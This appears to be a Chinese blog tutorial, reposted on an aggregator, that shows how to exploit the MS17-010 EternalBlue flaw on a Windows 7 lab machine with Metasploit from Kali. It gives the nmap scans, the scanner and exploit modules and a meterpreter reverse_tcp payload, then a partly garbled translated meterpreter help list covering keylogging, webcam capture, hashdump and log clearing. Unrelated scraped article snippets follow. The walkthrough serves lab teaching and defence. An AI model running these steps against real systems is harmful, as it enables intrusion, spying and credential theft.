草庐IT

kali利用MSF对永恒之蓝漏洞入侵windows7

Neatsuki 2023-11-21 原文

                                                                      warning

本文目的并不是教会学者入侵win7主机,

而是加强防范

kali入侵win7

步骤一:实验环境的搭建

攻击机:kali(2022.3版本)
靶机:win7 专业版 sp1 x64位

安装好上面两个环境后分别都打开

kali环境:

 Windows7环境:

 让我们查找win7IP地址

打开终端输入

nmap -sP 输入kali的IP地址/24

发现有4个IP地址

 使用nmap扫描这几个ip

nmap -O 输入扫描好的IP地址

 可以看到445端口是打开状态而且系统是Windows

打开终端输入

msfconsole

出现这样界面就可以了

 每次打开msf工具的图案都不相同,不需要担心

搜寻相关的攻击辅助模块和攻击模块

然后输入

search ms17_010

exploit/windows/smb/ms17_010_eternalblue 这个是攻击模块
auxiliary/scanner/smb/smb_ms17_010 这个是扫描模块

知道模块了,如何使用呢?

输入

use auxiliary/scanner/smb/smb_ms17_010 

模块前面加上use

然后会变成这样

扫描检测漏洞辅助模块加载完成了

检测需要传入什么参数?

突然有声音钻进我的耳朵里

用rhost

对啊,这参数比较简单,输入攻击目标IP即可

set rhosts 192.168.0.122

 忘记加s结果报错

接着执行这个已经设置好参数的探测模块

输入

run

翻译为:192.168.0.122:445 - 主机可能容易受到 MS17-010 的攻击!- Windows 7 专业版 7601 服务包 1 x64(64 位)
[*] 192.168.0.122:445 - 已扫描 1 个主机中的 1 个(100% 完成)
[*]辅助模块执行完成

我们的攻击已成功一大半,下面让我们进行对目标主机的攻击

输入

run exploit/windows/smb/ms17_010_eternalblue

然后出现以下界面

 我们需要设置的参数为payload(攻击载荷),rhost(目标IP)

输入

set payload windows/x64/meterpreter/reverse_tcp

 然后得到以下界面

然后在输入

set rhosts 192.168.0.122

得到

 注意这是最后一步,也是最关键一步输入

exploit

然后成为这样

如果网络不好的话会在这里卡一会,或者目标系统有杀软的话,就会卡在这里

 最后看见win了吗,恭喜你没成功拿到权限

拿到权限以后输入

help

然后得到一下信息

 翻译:

? “帮助”菜单

background当前会话的背景

bg背景别名

bgkill终止后台meterpretr脚本

bglist列出正在运行的后台脚本

bgrun将meterpretr脚本作为后台执行

线

通道显示信息或控制活动通道

ls

close关闭频道

detach分离meterpreter会话(对于http

秒)

disable_unicode_encoding禁用unicode字符串的编码

enable_unicode编码启用unicode字符串编码

exit终止meterpreter会话

get_timeouts获取当前会话超时值

guid获取会话guid

帮助帮助菜单

info显示有关Post模块的信息

irb在当前浏览器上打开一个交互式Ruby shell

一场

load加载一个或多个meterpreter扩展

machine_id获取连接到

一场

migrate将服务器迁移到另一个进程

pivot管理pivot侦听器

pry打开当前会话上的pry调试器

quit终止meterpreter会话

read从通道读取数据

resource运行存储在文件中的命令

run执行meterpreter脚本或Post模块

安全(重新)协商服务器上的TLV数据包加密

会话

sessions快速切换到另一个会话

set_timeouts设置当前会话超时值

睡眠力计安静下来,然后重新建立

ish会话

ssl_verify修改ssl证书验证设置

英国

transport管理传输机制

将不推荐的别名用于“load”

uuid获取当前会话的uuid

write将数据写入通道


Stdapi:文件系统命令

============================

命令说明

------- -----------

cat将文件的内容读到屏幕上

cd更改目录

checksum检索文件的校验和

cp将源复制到目标

del删除指定的文件

dir列表文件(ls的别名)

下载下载文件或目录

编辑编辑文件

getlwd打印本地工作目录

getwd打印工作目录

lcat将本地文件的内容读取到屏幕

lcd更改本地工作目录

lls列出本地文件

lpwd打印本地工作目录

ls列表文件

mkdir生成目录

mv将源移动到目标

pwd打印工作目录

rm删除指定的文件

rmdir删除目录

搜索搜索文件

show_mount列出所有装载点/逻辑驱动器

上传上传文件或目录


Stdapi:网络命令

===========================

命令说明

------- -----------

arp显示主机arp缓存

getproxy显示当前代理配置

ifconfig显示接口

ipconfig显示接口

netstat显示网络连接

portfwd将本地端口转发到远程服务

resolve解析目标上的一组主机名

route查看和修改路由表


Stdapi:系统命令

=======================

命令说明

------- -----------

clearev清除事件日志

drop_token放弃任何活动的模拟令牌。

execute执行命令

getenv获取一个或多个环境变量值

getpid获取当前进程标识符

getprivs尝试启用当前

过程

getsid获取服务器作为运行的用户的SID

getuid获取服务器运行的用户

kill终止进程

localtime显示目标系统本地日期和时间

pgrep按名称筛选进程

pkill按名称终止进程

ps(秒)

clearev清除事件日志

drop_token放弃任何活动的模拟令牌。

execute执行命令

getenv获取一个或多个环境变量值

getpid获取当前进程标识符

getprivs尝试启用当前

过程

getsid获取服务器作为运行的用户的SID

getuid获取服务器运行的用户

kill终止进程

localtime显示目标系统本地日期和时间

pgrep按名称筛选进程

pkill按名称终止进程

ps列出正在运行的进程

重新启动重新启动远程计算机

reg修改并与远程注册表交互

rev2self在远程计算机上调用RevertToSelf()

shell放入系统命令shell

shutdown关闭远程计算机

steep_token尝试从目标窃取模拟令牌

过程

suspend挂起或恢复进程列表

sysinfo获取有关远程系统的信息,例如操作系统


Stdapi:用户界面命令

===============================

命令说明

------- -----------

enumdesktops列出所有可访问的桌面和窗口站

getdesktop获取当前meterpreter桌面

idletime返回远程用户已使用的秒数

多尔

keyboard_send发送击键

keyevent发送关键事件

keyscan_dump转储击键缓冲区

keyscan_start开始捕获击键

keyscan_stop停止捕获击键

mouse发送鼠标事件

屏幕共享实时观看远程用户桌面

屏幕截图抓取交互式桌面的屏幕截图

setdesktop更改仪表当前桌面

uictl控制一些用户界面组件


Stdapi:网络摄像头命令

=======================

命令说明

------- -----------

record_mic从默认麦克风录制音频X秒

webcam_chat开始视频聊天

webcam_list列出网络摄像头

webcam_snap从指定的网络摄像头获取快照

webcam_stream从指定的网络摄像机播放视频流


Stdapi:音频输出命令

=============================

命令说明

------- -----------

play在目标系统上播放波形音频文件(.wav)


Priv:提升命令

======================

命令说明

------- -----------

getsystem尝试将您的权限提升到本地系统的权限

.


Priv:密码数据库命令

================================

命令说明

------- -----------

hashdump转储SAM数据库的内容


Priv:Timestomp命令

========================

命令说明

------- -----------

timestomp操作文件MACE属性

拿系统命令是

shell

 我们发现出现了乱码输入这个指令解决乱码问题

chcp 65001

我电脑太卡了,剩下的不弄了

有关kali利用MSF对永恒之蓝漏洞入侵windows7的更多相关文章

  1. ruby - 在 Ruby 程序执行时阻止 Windows 7 PC 进入休眠状态 - 2

    我需要在客户计算机上运行Ruby应用程序。通常需要几天才能完成(复制大备份文件)。问题是如果启用sleep,它会中断应用程序。否则,计算机将持续运行数周,直到我下次访问为止。有什么方法可以防止执行期间休眠并让Windows在执行后休眠吗?欢迎任何疯狂的想法;-) 最佳答案 Here建议使用SetThreadExecutionStateWinAPI函数,使应用程序能够通知系统它正在使用中,从而防止系统在应用程序运行时进入休眠状态或关闭显示。像这样的东西:require'Win32API'ES_AWAYMODE_REQUIRED=0x0

  2. ruby - 在 Windows 机器上使用 Ruby 进行开发是否会适得其反? - 2

    这似乎非常适得其反,因为太多的gem会在window上破裂。我一直在处理很多mysql和ruby​​-mysqlgem问题(gem本身发生段错误,一个名为UnixSocket的类显然在Windows机器上不能正常工作,等等)。我只是在浪费时间吗?我应该转向不同的脚本语言吗? 最佳答案 我在Windows上使用Ruby的经验很少,但是当我开始使用Ruby时,我是在Windows上,我的总体印象是它不是Windows原生系统。因此,在主要使用Windows多年之后,开始使用Ruby促使我切换回原来的系统Unix,这次是Linux。Rub

  3. Vscode+Cmake配置并运行opencv环境(Windows和Ubuntu大同小异) - 2

    之前在培训新生的时候,windows环境下配置opencv环境一直教的都是网上主流的vsstudio配置属性表,但是这个似乎对新生来说难度略高(虽然个人觉得完全是他们自己的问题),加之暑假之后对cmake实在是爱不释手,且这样配置确实十分简单(其实都不需要配置),故斗胆妄言vscode下配置CV之法。其实极为简单,图比较多所以很长。如果你看此文还配不好,你应该思考一下是不是自己的问题。闲话少说,直接开始。0.CMkae简介有的人到大二了都不知道cmake是什么,我不说是谁。CMake是一个开源免费并且跨平台的构建工具,可以用简单的语句来描述所有平台的编译过程。它能够根据当前所在平台输出对应的m

  4. Tomcat AJP 文件包含漏洞(CVE-2020-1938) - 2

    目录1.漏洞简介2、AJP13协议介绍Tomcat主要有两大功能:3.Tomcat远程文件包含漏洞分析4.漏洞复现 5、漏洞分析6.RCE实现的原理1.漏洞简介2020年2月20日,公开CNVD的漏洞公告中发现ApacheTomcat文件包含漏洞(CVE-2020-1938)。ApacheTomcat是Apache开源组织开发的用于处理HTTP服务的项目。ApacheTomcat服务器中被发现存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件。该漏洞是一个单独的文件包含漏洞,依赖于Tomcat的AJP(定向包协议)。AJP自身存在一定缺陷,导致存在可控

  5. 深度学习部署:Windows安装pycocotools报错解决方法 - 2

    深度学习部署:Windows安装pycocotools报错解决方法1.pycocotools库的简介2.pycocotools安装的坑3.解决办法更多Ai资讯:公主号AiCharm本系列是作者在跑一些深度学习实例时,遇到的各种各样的问题及解决办法,希望能够帮助到大家。ERROR:Commanderroredoutwithexitstatus1:'D:\Anaconda3\python.exe'-u-c'importsys,setuptools,tokenize;sys.argv[0]='"'"'C:\\Users\\46653\\AppData\\Local\\Temp\\pip-instal

  6. ruby - 如何在 Ruby 中执行 Windows CLI 命令? - 2

    我在目录“C:\DocumentsandSettings\test.exe”中有一个文件,但是当我用单引号编写命令时`C:\DocumentsandSettings\test.exe(我无法在此框中显示),用于在Ruby中执行命令,我无法这样做,我收到的错误是找不到文件或目录。我尝试用“//”和“\”替换“\”,但似乎没有任何效果。我也使用过系统、IO.popen和exec命令,但所有的努力都是徒劳的。exec命令还使程序退出,这是我不想发生的。提前致谢。 最佳答案 反引号环境就像双引号,所以反斜杠用于转义。此外,Ruby会将空格解

  7. 什么是0day漏洞?如何预防0day攻击? - 2

    什么是0day漏洞?0day漏洞,是指已经被发现,但是还未被公开,同时官方还没有相关补丁的漏洞;通俗的讲,就是除了黑客,没人知道他的存在,其往往具有很大的突发性、破坏性、致命性。0day漏洞之所以称为0day,正是因为其补丁永远晚于攻击。所以攻击者利用0day漏洞攻击的成功率极高,往往可以达到目的并全身而退,而防守方却一无所知,只有在漏洞公布之后,才后知后觉,却为时已晚。“后知后觉、反应迟钝”就是当前安全防护面对0day攻击的真实写照!为了方便大家理解,中科三方为大家梳理当前安全防护模式下,一个漏洞从发现到解决的三个时间节点:T0:此时漏洞即0day漏洞,是已经被发现,还未被公开,官方还没有相

  8. ruby - 错误 : Failed to build gem native extension on Windows - 2

    我在安装“redcarpet”gem时遇到以下错误。它在我friend的机器上安装没有问题。(我想安装它来运行yard)ruby版本:1.9.3命令输出:D:\Learning\Common_POM_FW\SampleProjects>yard[error]:Missing'redcarpet'gemforMarkdownformatting.Installitwith`geminstallredcarpet`D:\Learning\Common_POM_FW\SampleProjects>geminstallredcarpetTemporarilyenhancingPATHtoinc

  9. ruby - 从 Ruby 连接到适用于 Windows Phone 8 的 Microsoft 推送通知服务 - 2

    我们正在开发一个需要推送通知的WP8应用程序。为了测试它,我们使用CURL命令行运行推送通知POST请求,确保它实际连接,使用客户端SSL证书进行身份验证并发送正确的数据。我们确实知道,当我们收到对设备的推送时,这项工作是有效的。这是我们一直用于测试目的的CURL命令:curl--certclient_cert.pem-v-H"Content-Type:text/xml"-H"X-WindowsPhone-Target:Toast"-H"X-NotificationClass:2"-XPOST-d"MytitleMysubtitle"https://db3.notify.live.ne

  10. ruby - 在 Windows 7 上运行 Jekyll - 2

    我在Windows7上运行Jekyll时遇到问题。当我运行时jekyll出现以下错误C:\temp\jekyll\kouphax.github.com>jekyllConfigurationfromC:/temp/jekyll/kouphax.github.com/_config.ymlBuildingsite:C:/temp/jekyll/kouphax.github.com->C:/temp/jekyll/kouphax.github.com/_siteunit-testingYouaremissingalibraryrequiredforTextile.Pleaserun:$[s

随机推荐